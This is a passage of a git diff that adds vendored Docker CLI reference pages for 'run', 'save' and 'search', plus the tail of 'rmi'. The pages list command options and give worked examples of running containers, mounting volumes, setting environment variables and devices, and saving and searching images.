4986bf8c1536 9 weeks ago 2.43 MB + +To remove an image using its digest: + + $ docker rmi localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf + Untagged: localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf + Deleted: 
4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125 + Deleted: ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2 + Deleted: df7546f9f060a2268024c8a230d8639878585defcc1bc6f79d2728a13957871b diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/run.md b/vendor/github.com/docker/docker/docs/reference/commandline/run.md new file mode 100644 index 0000000000..e57ba4bbea --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/run.md @@ -0,0 +1,732 @@ +--- +title: "run" +description: "The run command description and usage" +keywords: "run, command, container" +--- + + + +# run + +```markdown +Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] + +Run a command in a new container + +Options: + --add-host value Add a custom host-to-IP mapping (host:ip) (default []) + -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) + --blkio-weight value Block IO (relative weight), between 10 and 1000 + --blkio-weight-device value Block IO weight (relative device weight) (default []) + --cap-add value Add Linux capabilities (default []) + --cap-drop value Drop Linux capabilities (default []) + --cgroup-parent string Optional parent cgroup for the container + --cidfile string Write the container ID to the file + --cpu-count int The number of CPUs available for execution by the container. + Windows daemon only. On Windows Server containers, this is + approximated as a percentage of total CPU usage. + --cpu-percent int Limit percentage of CPU available for execution + by the container. Windows daemon only. + The processor resource controls are mutually + exclusive, the order of precedence is CPUCount + first, then CPUShares, and CPUPercent last. 
+ --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period + --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota + -c, --cpu-shares int CPU shares (relative weight) + --cpus NanoCPUs Number of CPUs (default 0.000) + --cpu-rt-period int Limit the CPU real-time period in microseconds + --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds + --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) + --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) + -d, --detach Run container in background and print container ID + --detach-keys string Override the key sequence for detaching a container + --device value Add a host device to the container (default []) + --device-read-bps value Limit read rate (bytes per second) from a device (default []) + --device-read-iops value Limit read rate (IO per second) from a device (default []) + --device-write-bps value Limit write rate (bytes per second) to a device (default []) + --device-write-iops value Limit write rate (IO per second) to a device (default []) + --disable-content-trust Skip image verification (default true) + --dns value Set custom DNS servers (default []) + --dns-option value Set DNS options (default []) + --dns-search value Set custom DNS search domains (default []) + --entrypoint string Overwrite the default ENTRYPOINT of the image + -e, --env value Set environment variables (default []) + --env-file value Read in a file of environment variables (default []) + --expose value Expose a port or a range of ports (default []) + --group-add value Add additional groups to join (default []) + --health-cmd string Command to run to check health + --health-interval duration Time between running the check (ns|us|ms|s|m|h) (default 0s) + --health-retries int Consecutive failures needed to report unhealthy + --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s) + --help Print usage + -h, --hostname string Container host name + 
--init Run an init inside the container that forwards signals and reaps processes + --init-path string Path to the docker-init binary + -i, --interactive Keep STDIN open even if not attached + --io-maxbandwidth string Maximum IO bandwidth limit for the system drive (Windows only) + (Windows only). The format is ``. + Unit is optional and can be `b` (bytes per second), + `k` (kilobytes per second), `m` (megabytes per second), + or `g` (gigabytes per second). If you omit the unit, + the system uses bytes per second. + --io-maxbandwidth and --io-maxiops are mutually exclusive options. + --io-maxiops uint Maximum IOps limit for the system drive (Windows only) + --ip string Container IPv4 address (e.g. 172.30.100.104) + --ip6 string Container IPv6 address (e.g. 2001:db8::33) + --ipc string IPC namespace to use + --isolation string Container isolation technology + --kernel-memory string Kernel memory limit + -l, --label value Set meta data on a container (default []) + --label-file value Read in a line delimited file of labels (default []) + --link value Add link to another container (default []) + --link-local-ip value Container IPv4/IPv6 link-local addresses (default []) + --log-driver string Logging driver for the container + --log-opt value Log driver options (default []) + --mac-address string Container MAC address (e.g. 
92:d0:c6:0a:29:33) + -m, --memory string Memory limit + --memory-reservation string Memory soft limit + --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap + --memory-swappiness int Tune container memory swappiness (0 to 100) (default -1) + --name string Assign a name to the container + --network-alias value Add network-scoped alias for the container (default []) + --network string Connect a container to a network + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack + '|': connect to a user-defined network + --no-healthcheck Disable any container-specified HEALTHCHECK + --oom-kill-disable Disable OOM Killer + --oom-score-adj int Tune host's OOM preferences (-1000 to 1000) + --pid string PID namespace to use + --pids-limit int Tune container pids limit (set -1 for unlimited) + --privileged Give extended privileges to this container + -p, --publish value Publish a container's port(s) to the host (default []) + -P, --publish-all Publish all exposed ports to random ports + --read-only Mount the container's root filesystem as read only + --restart string Restart policy to apply when a container exits (default "no") + Possible values are : no, on-failure[:max-retry], always, unless-stopped + --rm Automatically remove the container when it exits + --runtime string Runtime to use for this container + --security-opt value Security Options (default []) + --shm-size string Size of /dev/shm, default value is 64MB. + The format is ``. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), + or `g` (gigabytes). If you omit the unit, the system uses bytes. 
+ --sig-proxy Proxy received signals to the process (default true) + --stop-signal string Signal to stop a container, SIGTERM by default (default "SIGTERM") + --stop-timeout=10 Timeout (in seconds) to stop a container + --storage-opt value Storage driver options for the container (default []) + --sysctl value Sysctl options (default map[]) + --tmpfs value Mount a tmpfs directory (default []) + -t, --tty Allocate a pseudo-TTY + --ulimit value Ulimit options (default []) + -u, --user string Username or UID (format: [:]) + --userns string User namespace to use + 'host': Use the Docker host user namespace + '': Use the Docker daemon user namespace specified by `--userns-remap` option. + --uts string UTS namespace to use + -v, --volume value Bind mount a volume (default []). The format + is `[host-src:]container-dest[:]`. + The comma-delimited `options` are [rw|ro], + [z|Z], [[r]shared|[r]slave|[r]private], and + [nocopy]. The 'host-src' is an absolute path + or a name value. + --volume-driver string Optional volume driver for the container + --volumes-from value Mount volumes from the specified container(s) (default []) + -w, --workdir string Working directory inside the container +``` + +The `docker run` command first `creates` a writeable container layer over the +specified image, and then `starts` it using the specified command. That is, +`docker run` is equivalent to the API `/containers/create` then +`/containers/(id)/start`. A stopped container can be restarted with all its +previous changes intact using `docker start`. See `docker ps -a` to view a list +of all containers. + +The `docker run` command can be used in combination with `docker commit` to +[*change the command that a container runs*](commit.md). There is additional detailed information about `docker run` in the [Docker run reference](../run.md). + +For information on connecting a container to a network, see the ["*Docker network overview*"](https://docs.docker.com/engine/userguide/networking/). 
+ +## Examples + +### Assign name and allocate pseudo-TTY (--name, -it) + + $ docker run --name test -it debian + root@d6c0fe130dba:/# exit 13 + $ echo $? + 13 + $ docker ps -a | grep test + d6c0fe130dba debian:7 "/bin/bash" 26 seconds ago Exited (13) 17 seconds ago test + +This example runs a container named `test` using the `debian:latest` +image. The `-it` instructs Docker to allocate a pseudo-TTY connected to +the container's stdin; creating an interactive `bash` shell in the container. +In the example, the `bash` shell is quit by entering +`exit 13`. This exit code is passed on to the caller of +`docker run`, and is recorded in the `test` container's metadata. + +### Capture container ID (--cidfile) + + $ docker run --cidfile /tmp/docker_test.cid ubuntu echo "test" + +This will create a container and print `test` to the console. The `cidfile` +flag makes Docker attempt to create a new file and write the container ID to it. +If the file exists already, Docker will return an error. Docker will close this +file when `docker run` exits. + +### Full container capabilities (--privileged) + + $ docker run -t -i --rm ubuntu bash + root@bc338942ef20:/# mount -t tmpfs none /mnt + mount: permission denied + +This will *not* work, because by default, most potentially dangerous kernel +capabilities are dropped; including `cap_sys_admin` (which is required to mount +filesystems). However, the `--privileged` flag will allow it to run: + + $ docker run -t -i --privileged ubuntu bash + root@50e3f57e16e6:/# mount -t tmpfs none /mnt + root@50e3f57e16e6:/# df -h + Filesystem Size Used Avail Use% Mounted on + none 1.9G 0 1.9G 0% /mnt + +The `--privileged` flag gives *all* capabilities to the container, and it also +lifts all the limitations enforced by the `device` cgroup controller. In other +words, the container can then do almost everything that the host can do. This +flag exists to allow special use-cases, like running Docker within Docker. 
+ +### Set working directory (-w) + + $ docker run -w /path/to/dir/ -i -t ubuntu pwd + +The `-w` lets the command being executed inside directory given, here +`/path/to/dir/`. If the path does not exist it is created inside the container. + +### Set storage driver options per container + + $ docker run -it --storage-opt size=120G fedora /bin/bash + +This (size) will allow to set the container rootfs size to 120G at creation time. +This option is only available for the `devicemapper`, `btrfs`, `overlay2`, +`windowsfilter` and `zfs` graph drivers. +For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers, +user cannot pass a size less than the Default BaseFS Size. +For the `overlay2` storage driver, the size option is only available if the +backing fs is `xfs` and mounted with the `pquota` mount option. +Under these conditions, user can pass any size less then the backing fs size. + +### Mount tmpfs (--tmpfs) + + $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image + +The `--tmpfs` flag mounts an empty tmpfs into the container with the `rw`, +`noexec`, `nosuid`, `size=65536k` options. + +### Mount volume (-v, --read-only) + + $ docker run -v `pwd`:`pwd` -w `pwd` -i -t ubuntu pwd + +The `-v` flag mounts the current working directory into the container. The `-w` +lets the command being executed inside the current working directory, by +changing into the directory to the value returned by `pwd`. So this +combination executes the command using the container, but inside the +current working directory. + + $ docker run -v /doesnt/exist:/foo -w /foo -i -t ubuntu bash + +When the host directory of a bind-mounted volume doesn't exist, Docker +will automatically create this directory on the host for you. In the +example above, Docker will create the `/doesnt/exist` +folder before starting your container. 
+ + $ docker run --read-only -v /icanwrite busybox touch /icanwrite/here + +Volumes can be used in combination with `--read-only` to control where +a container writes files. The `--read-only` flag mounts the container's root +filesystem as read only prohibiting writes to locations other than the +specified volumes for the container. + + $ docker run -t -i -v /var/run/docker.sock:/var/run/docker.sock -v /path/to/static-docker-binary:/usr/bin/docker busybox sh + +By bind-mounting the docker unix socket and statically linked docker +binary (refer to [get the linux binary]( +https://docs.docker.com/engine/installation/binaries/#/get-the-linux-binary)), +you give the container the full access to create and manipulate the host's +Docker daemon. + +On Windows, the paths must be specified using Windows-style semantics. + + PS C:\> docker run -v c:\foo:c:\dest microsoft/nanoserver cmd /s /c type c:\dest\somefile.txt + Contents of file + + PS C:\> docker run -v c:\foo:d: microsoft/nanoserver cmd /s /c type d:\somefile.txt + Contents of file + +The following examples will fail when using Windows-based containers, as the +destination of a volume or bind-mount inside the container must be one of: +a non-existing or empty directory; or a drive other than C:. Further, the source +of a bind mount must be a local directory, not a file. + + net use z: \\remotemachine\share + docker run -v z:\foo:c:\dest ... + docker run -v \\uncpath\to\directory:c:\dest ... + docker run -v c:\foo\somefile.txt:c:\dest ... + docker run -v c:\foo:c: ... + docker run -v c:\foo:c:\existing-directory-with-contents ... + +For in-depth information about volumes, refer to [manage data in containers](https://docs.docker.com/engine/tutorials/dockervolumes/) + +### Publish or expose port (-p, --expose) + + $ docker run -p 127.0.0.1:80:8080 ubuntu bash + +This binds port `8080` of the container to port `80` on `127.0.0.1` of the host +machine. 
The [Docker User +Guide](https://docs.docker.com/engine/userguide/networking/default_network/dockerlinks/) +explains in detail how to manipulate ports in Docker. + + $ docker run --expose 80 ubuntu bash + +This exposes port `80` of the container without publishing the port to the host +system's interfaces. + +### Set environment variables (-e, --env, --env-file) + + $ docker run -e MYVAR1 --env MYVAR2=foo --env-file ./env.list ubuntu bash + +This sets simple (non-array) environmental variables in the container. For +illustration all three +flags are shown here. Where `-e`, `--env` take an environment variable and +value, or if no `=` is provided, then that variable's current value, set via +`export`, is passed through (i.e. `$MYVAR1` from the host is set to `$MYVAR1` +in the container). When no `=` is provided and that variable is not defined +in the client's environment then that variable will be removed from the +container's list of environment variables. All three flags, `-e`, `--env` and +`--env-file` can be repeated. + +Regardless of the order of these three flags, the `--env-file` are processed +first, and then `-e`, `--env` flags. This way, the `-e` or `--env` will +override variables as needed. + + $ cat ./env.list + TEST_FOO=BAR + $ docker run --env TEST_FOO="This is a test" --env-file ./env.list busybox env | grep TEST_FOO + TEST_FOO=This is a test + +The `--env-file` flag takes a filename as an argument and expects each line +to be in the `VAR=VAL` format, mimicking the argument passed to `--env`. 
Comment +lines need only be prefixed with `#` + +An example of a file passed with `--env-file` + + $ cat ./env.list + TEST_FOO=BAR + + # this is a comment + TEST_APP_DEST_HOST=10.10.0.127 + TEST_APP_DEST_PORT=8888 + _TEST_BAR=FOO + TEST_APP_42=magic + helloWorld=true + 123qwe=bar + org.spring.config=something + + # pass through this variable from the caller + TEST_PASSTHROUGH + $ TEST_PASSTHROUGH=howdy docker run --env-file ./env.list busybox env + PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + HOSTNAME=5198e0745561 + TEST_FOO=BAR + TEST_APP_DEST_HOST=10.10.0.127 + TEST_APP_DEST_PORT=8888 + _TEST_BAR=FOO + TEST_APP_42=magic + helloWorld=true + TEST_PASSTHROUGH=howdy + HOME=/root + 123qwe=bar + org.spring.config=something + + $ docker run --env-file ./env.list busybox env + PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + HOSTNAME=5198e0745561 + TEST_FOO=BAR + TEST_APP_DEST_HOST=10.10.0.127 + TEST_APP_DEST_PORT=8888 + _TEST_BAR=FOO + TEST_APP_42=magic + helloWorld=true + TEST_PASSTHROUGH= + HOME=/root + 123qwe=bar + org.spring.config=something + +### Set metadata on container (-l, --label, --label-file) + +A label is a `key=value` pair that applies metadata to a container. To label a container with two labels: + + $ docker run -l my-label --label com.example.foo=bar ubuntu bash + +The `my-label` key doesn't specify a value so the label defaults to an empty +string(`""`). To add multiple labels, repeat the label flag (`-l` or `--label`). + +The `key=value` must be unique to avoid overwriting the label value. If you +specify labels with identical keys but different values, each subsequent value +overwrites the previous. Docker uses the last `key=value` you supply. + +Use the `--label-file` flag to load multiple labels from a file. Delimit each +label in the file with an EOL mark. 
The example below loads labels from a
+labels file in the current directory:
+
+    $ docker run --label-file ./labels ubuntu bash
+
+The label-file format is similar to the format for loading environment
+variables. (Unlike environment variables, labels are not visible to processes
+running inside a container.) The following example illustrates a label-file
+format:
+
+    com.example.label1="a label"
+
+    # this is a comment
+    com.example.label2=another\ label
+    com.example.label3
+
+You can load multiple label-files by supplying multiple `--label-file` flags.
+
+For additional information on working with labels, see [*Labels - custom
+metadata in Docker*](https://docs.docker.com/engine/userguide/labels-custom-metadata/) in the Docker User
+Guide.
+
+### Connect a container to a network (--network)
+
+When you start a container use the `--network` flag to connect it to a network.
+This adds the `busybox` container to the `my-net` network.
+
+```bash
+$ docker run -itd --network=my-net busybox
+```
+
+You can also choose the IP addresses for the container with `--ip` and `--ip6`
+flags when you start the container on a user-defined network.
+
+```bash
+$ docker run -itd --network=my-net --ip=10.10.9.75 busybox
+```
+
+If you want to add a running container to a network use the `docker network connect` subcommand.
+
+You can connect multiple containers to the same network. Once connected, the
+containers can communicate easily using only another container's IP address
+or name. For `overlay` networks or custom plugins that support multi-host
+connectivity, containers connected to the same multi-host network but launched
+from different Engines can also communicate in this way.
+
+**Note**: Service discovery is unavailable on the default bridge network.
+Containers can communicate via their IP addresses by default. To communicate
+by name, they must be linked.
+
+You can disconnect a container from a network using the `docker network
+disconnect` command. 
+ +### Mount volumes from container (--volumes-from) + + $ docker run --volumes-from 777f7dc92da7 --volumes-from ba8c0c54f0f2:ro -i -t ubuntu pwd + +The `--volumes-from` flag mounts all the defined volumes from the referenced +containers. Containers can be specified by repetitions of the `--volumes-from` +argument. The container ID may be optionally suffixed with `:ro` or `:rw` to +mount the volumes in read-only or read-write mode, respectively. By default, +the volumes are mounted in the same mode (read write or read only) as +the reference container. + +Labeling systems like SELinux require that proper labels are placed on volume +content mounted into a container. Without a label, the security system might +prevent the processes running inside the container from using the content. By +default, Docker does not change the labels set by the OS. + +To change the label in the container context, you can add either of two suffixes +`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file +objects on the shared volumes. The `z` option tells Docker that two containers +share the volume content. As a result, Docker labels the content with a shared +content label. Shared volume labels allow all containers to read/write content. +The `Z` option tells Docker to label the content with a private unshared label. +Only the current container can use a private volume. + +### Attach to STDIN/STDOUT/STDERR (-a) + +The `-a` flag tells `docker run` to bind to the container's `STDIN`, `STDOUT` +or `STDERR`. This makes it possible to manipulate the output and input as +needed. + + $ echo "test" | docker run -i -a stdin ubuntu cat - + +This pipes data into a container and prints the container's ID by attaching +only to the container's `STDIN`. + + $ docker run -a stderr ubuntu echo test + +This isn't going to print anything unless there's an error because we've +only attached to the `STDERR` of the container. 
The container's logs +still store what's been written to `STDERR` and `STDOUT`. + + $ cat somefile | docker run -i -a stdin mybuilder dobuild + +This is how piping a file into a container could be done for a build. +The container's ID will be printed after the build is done and the build +logs could be retrieved using `docker logs`. This is +useful if you need to pipe a file or something else into a container and +retrieve the container's ID once the container has finished running. + +### Add host device to container (--device) + + $ docker run --device=/dev/sdc:/dev/xvdc --device=/dev/sdd --device=/dev/zero:/dev/nulo -i -t ubuntu ls -l /dev/{xvdc,sdd,nulo} + brw-rw---- 1 root disk 8, 2 Feb 9 16:05 /dev/xvdc + brw-rw---- 1 root disk 8, 3 Feb 9 16:05 /dev/sdd + crw-rw-rw- 1 root root 1, 5 Feb 9 16:05 /dev/nulo + +It is often necessary to directly expose devices to a container. The `--device` +option enables that. For example, a specific block storage device or loop +device or audio device can be added to an otherwise unprivileged container +(without the `--privileged` flag) and have the application directly access it. + +By default, the container will be able to `read`, `write` and `mknod` these devices. +This can be overridden using a third `:rwm` set of options to each `--device` +flag: + + + $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc + + Command (m for help): q + $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk /dev/xvdc + You will not be able to write the partition table. + + Command (m for help): q + + $ docker run --device=/dev/sda:/dev/xvdc:rw --rm -it ubuntu fdisk /dev/xvdc + + Command (m for help): q + + $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk /dev/xvdc + fdisk: unable to open /dev/xvdc: Operation not permitted + +> **Note:** +> `--device` cannot be safely used with ephemeral devices. Block devices +> that may be removed should not be added to untrusted containers with +> `--device`. 
+ +### Restart policies (--restart) + +Use Docker's `--restart` to specify a container's *restart policy*. A restart +policy controls whether the Docker daemon restarts a container after exit. +Docker supports the following restart policies: + + + + + + + + + + + + + + + + + + + + + + + + + + +
PolicyResult
no + Do not automatically restart the container when it exits. This is the + default. +
+ + on-failure[:max-retries] + + + Restart only if the container exits with a non-zero exit status. + Optionally, limit the number of restart retries the Docker + daemon attempts. +
always + Always restart the container regardless of the exit status. + When you specify always, the Docker daemon will try to restart + the container indefinitely. The container will also always start + on daemon startup, regardless of the current state of the container. +
unless-stopped + Always restart the container regardless of the exit status, but + do not start it on daemon startup if the container has been put + to a stopped state before. +
+ + $ docker run --restart=always redis + +This will run the `redis` container with a restart policy of **always** +so that if the container exits, Docker will restart it. + +More detailed information on restart policies can be found in the +[Restart Policies (--restart)](../run.md#restart-policies-restart) +section of the Docker run reference page. + +### Add entries to container hosts file (--add-host) + +You can add other hosts into a container's `/etc/hosts` file by using one or +more `--add-host` flags. This example adds a static address for a host named +`docker`: + + $ docker run --add-host=docker:10.180.0.1 --rm -it debian + root@f38c87f2a42d:/# ping docker + PING docker (10.180.0.1): 48 data bytes + 56 bytes from 10.180.0.1: icmp_seq=0 ttl=254 time=7.600 ms + 56 bytes from 10.180.0.1: icmp_seq=1 ttl=254 time=30.705 ms + ^C--- docker ping statistics --- + 2 packets transmitted, 2 packets received, 0% packet loss + round-trip min/avg/max/stddev = 7.600/19.152/30.705/11.553 ms + +Sometimes you need to connect to the Docker host from within your +container. To enable this, pass the Docker host's IP address to +the container using the `--add-host` flag. To find the host's address, +use the `ip addr show` command. + +The flags you pass to `ip addr show` depend on whether you are +using IPv4 or IPv6 networking in your containers. Use the following +flags for IPv4 address retrieval for a network device named `eth0`: + + $ HOSTIP=`ip -4 addr show scope global dev eth0 | grep inet | awk '{print \$2}' | cut -d / -f 1` + $ docker run --add-host=docker:${HOSTIP} --rm -it debian + +For IPv6 use the `-6` flag instead of the `-4` flag. For other network +devices, replace `eth0` with the correct device name (for example `docker0` +for the bridge device). + +### Set ulimits in container (--ulimit) + +Since setting `ulimit` settings in a container requires extra privileges not +available in the default container, you can set these using the `--ulimit` flag. 
+ +`--ulimit` is specified with a soft and hard limit as such: +`<type>=<soft limit>[:<hard limit>]`, for example: + + $ docker run --ulimit nofile=1024:1024 --rm debian sh -c "ulimit -n" + 1024 + +> **Note:** +> If you do not provide a `hard limit`, the `soft limit` will be used +> for both values. If no `ulimits` are set, they will be inherited from +> the default `ulimits` set on the daemon. `as` option is disabled now. +> In other words, the following script is not supported: +> `$ docker run -it --ulimit as=1024 fedora /bin/bash` + +The values are sent to the appropriate `syscall` as they are set. +Docker doesn't perform any byte conversion. Take this into account when setting the values. + +#### For `nproc` usage + +Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to set the +maximum number of processes available to a user, not to a container. For example, start four +containers with `daemon` user: + + docker run -d -u daemon --ulimit nproc=3 busybox top + docker run -d -u daemon --ulimit nproc=3 busybox top + docker run -d -u daemon --ulimit nproc=3 busybox top + docker run -d -u daemon --ulimit nproc=3 busybox top + +The 4th container fails and reports "[8] System error: resource temporarily unavailable" error. +This fails because the caller set `nproc=3` resulting in the first three containers using up +the three processes quota set for the `daemon` user. + +### Stop container with signal (--stop-signal) + +The `--stop-signal` flag sets the system call signal that will be sent to the container to exit. +This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9, +or a signal name in the format SIGNAME, for instance SIGKILL. + +### Optional security options (--security-opt) + +On Windows, this flag can be used to specify the `credentialspec` option. +The `credentialspec` must be in the format `file://spec.txt` or `registry://keyname`. 
+ +### Stop container with timeout (--stop-timeout) + +The `--stop-timeout` flag sets the timeout (in seconds) after which a pre-defined (see `--stop-signal`) system call +signal will be sent to the container to exit. After the timeout elapses the container will be killed with SIGKILL. + +### Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Microsoft Windows. The `--isolation <value>` option sets a container's isolation +technology. On Linux, the only supported option is `default`, which uses +Linux namespaces. These two commands are equivalent on Linux: + +``` +$ docker run -d busybox top +$ docker run -d --isolation default busybox top +``` + +On Microsoft Windows, `--isolation` can take any of these values: + + +| Value | Description | +|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. | +| `process` | Namespace isolation only. | +| `hyperv` | Hyper-V hypervisor partition-based isolation. | + +On Windows, the default isolation for client is `hyperv`, and for server is +`process`. 
Therefore when running on Windows server without a `daemon` option +set, these two commands are equivalent: +``` +$ docker run -d --isolation default busybox top +$ docker run -d --isolation process busybox top +``` + +If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, +if running on Windows server, any of these commands also result in `hyperv` isolation: + +``` +$ docker run -d --isolation default busybox top +$ docker run -d --isolation hyperv busybox top +``` + +### Configure namespaced kernel parameters (sysctls) at runtime + +The `--sysctl` sets namespaced kernel parameters (sysctls) in the +container. For example, to turn on IP forwarding in the containers +network namespace, run this command: + + $ docker run --sysctl net.ipv4.ip_forward=1 someimage + + +> **Note**: Not all sysctls are namespaced. Docker does not support changing sysctls +> inside of a container that also modify the host system. As the kernel +> evolves we expect to see more sysctls become namespaced. + +#### Currently supported sysctls + + `IPC Namespace`: + + kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced + Sysctls beginning with fs.mqueue.* + + If you use the `--ipc=host` option these sysctls will not be allowed. + + `Network Namespace`: + Sysctls beginning with net.* + + If you use the `--network=host` option using these sysctls will not be allowed. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/save.md b/vendor/github.com/docker/docker/docs/reference/commandline/save.md new file mode 100644 index 0000000000..88a5fed103 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/save.md @@ -0,0 +1,45 @@ +--- +title: "save" +description: "The save command description and usage" +keywords: "tarred, repository, backup" +--- + + + +# save + +```markdown +Usage: docker save [OPTIONS] IMAGE [IMAGE...] 
+ +Save one or more images to a tar archive (streamed to STDOUT by default) + +Options: + --help Print usage + -o, --output string Write to a file, instead of STDOUT +``` + +Produces a tarred repository to the standard output stream. +Contains all parent layers, and all tags + versions, or specified `repo:tag`, for +each argument provided. + +It is used to create a backup that can then be used with `docker load` + + $ docker save busybox > busybox.tar + $ ls -sh busybox.tar + 2.7M busybox.tar + $ docker save --output busybox.tar busybox + $ ls -sh busybox.tar + 2.7M busybox.tar + $ docker save -o fedora-all.tar fedora + $ docker save -o fedora-latest.tar fedora:latest + +It is even useful to cherry-pick particular tags of an image repository + + $ docker save -o ubuntu.tar ubuntu:lucid ubuntu:saucy diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/search.md b/vendor/github.com/docker/docker/docs/reference/commandline/search.md new file mode 100644 index 0000000000..31faf37375 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/search.md @@ -0,0 +1,134 @@ +--- +title: "search" +description: "The search command description and usage" +keywords: "search, hub, images" +--- + + + +# search + +```markdown +Usage: docker search [OPTIONS] TERM + +Search the Docker Hub for images + +Options: + -f, --filter value Filter output based on conditions provided (default []) + - is-automated=(true|false) + - is-official=(true|false) + - stars= - image has at least 'number' stars + --help Print usage + --limit int Max number of search results (default 25) + --no-trunc Don't truncate output +``` + +Search [Docker Hub](https://hub.docker.com) for images + +See [*Find Public Images on Docker Hub*](https://docs.docker.com/engine/tutorials/dockerrepos/#searching-for-images) for +more details on finding shared images from the command line. 
+ +> **Note:** +> Search queries will only return up to 25 results + +## Examples + +### Search images by name + +This example displays images with a name containing 'busybox': + + $ docker search busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + busybox Busybox base image. 316 [OK] + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] + odise/busybox-python 2 [OK] + azukiapp/busybox This image is meant to be used as the base... 2 [OK] + ofayau/busybox-jvm Prepare busybox to install a 32 bits JVM. 1 [OK] + shingonoide/archlinux-busybox Arch Linux, a lightweight and flexible Lin... 1 [OK] + odise/busybox-curl 1 [OK] + ofayau/busybox-libc32 Busybox with 32 bits (and 64 bits) libs 1 [OK] + peelsky/zulu-openjdk-busybox 1 [OK] + skomma/busybox-data Docker image suitable for data volume cont... 1 [OK] + elektritter/busybox-teamspeak Lightweight teamspeak3 container based on... 1 [OK] + socketplane/busybox 1 [OK] + oveits/docker-nginx-busybox This is a tiny NginX docker image based on... 0 [OK] + ggtools/busybox-ubuntu Busybox ubuntu version with extra goodies 0 [OK] + nikfoundas/busybox-confd Minimal busybox based distribution of confd 0 [OK] + openshift/busybox-http-app 0 [OK] + jllopis/busybox 0 [OK] + swyckoff/busybox 0 [OK] + powellquiring/busybox 0 [OK] + williamyeh/busybox-sh Docker image for BusyBox's sh 0 [OK] + simplexsys/busybox-cli-powered Docker busybox images, with a few often us... 0 [OK] + fhisamoto/busybox-java Busybox java 0 [OK] + scottabernethy/busybox 0 [OK] + marclop/busybox-solr + +### Display non-truncated description (--no-trunc) + +This example displays images with a name containing 'busybox', +at least 3 stars and the description isn't truncated in the output: + + $ docker search --stars=3 --no-trunc busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + busybox Busybox base image. 325 [OK] + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made from scratch. 
Comes in git and cURL flavors. 8 [OK] + +## Limit search results (--limit) + +The flag `--limit` is the maximum number of results returned by a search. This value could +be in the range between 1 and 100. The default value of `--limit` is 25. + + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more +than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* stars (int - number of stars the image has) +* is-automated (true|false) - is the image automated or not +* is-official (true|false) - is the image official or not + + +### stars + +This example displays images with a name containing 'busybox' and at +least 3 stars: + + $ docker search --filter stars=3 busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + busybox Busybox base image. 325 [OK] + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] + + +### is-automated + +This example displays images with a name containing 'busybox' +and are automated builds: + + $ docker search --filter is-automated busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] + +### is-official + +This example displays images with a name containing 'busybox', at least +3 stars and are official builds: + + $ docker search --filter "is-official=true" --filter "stars=3" busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made... 
